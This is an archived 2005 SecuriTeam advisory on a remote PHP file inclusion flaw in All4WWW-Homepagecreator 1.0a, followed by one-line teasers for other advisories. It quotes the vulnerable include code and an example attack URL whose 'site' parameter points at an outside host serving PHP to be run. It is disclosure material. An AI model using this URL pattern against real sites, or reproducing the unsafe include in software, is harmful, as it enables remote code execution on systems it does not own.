[UNIX] All4WWW-Homepagecreator site Parameter Command Execution

From: SecuriTeam (support_at_securiteam.com)
Date: 04/25/05

    To: list@securiteam.com
    Date: 25 Apr 2005 18:42:08 +0200

    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      All4WWW-Homepagecreator site Parameter Command Execution

    SUMMARY

     <http://www.all4www.com/> All4WWW-Homepagecreator is "an easy to use home
    page creator program". Due to improper usage of PHP routines the All4WWW
    Homepagecreator can be caused to include external PHP code and execute its
    content via the 'site' parameter.

    DETAILS

    Vulnerable Systems:
     * All4WWW-Homepagecreator version 1.0a

    Vulnerable code:
    The following code can be found in the index.php file:
    ..
    if(!$site) {$site="home";}
    include "$site.dat";
    ..

    This allows an attacker to supply a URL similar to:
    http://[vuln-host]/index.php?site=http://[host]/some-file

    Which in turn will cause the site to include an external PHP file and
    execute its content.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dominusvis@click21.com.br>
    Francisco Alisson.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] TinyWeb Server DoS Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] 3Com FTP Server Buffer Overflow (CD)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [TOOL] Automagic SQL Injector
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] MSWebDVD Class (mswebdvd.dll) Null Pointer Assignment
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet Explorer can be crashed remotely ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)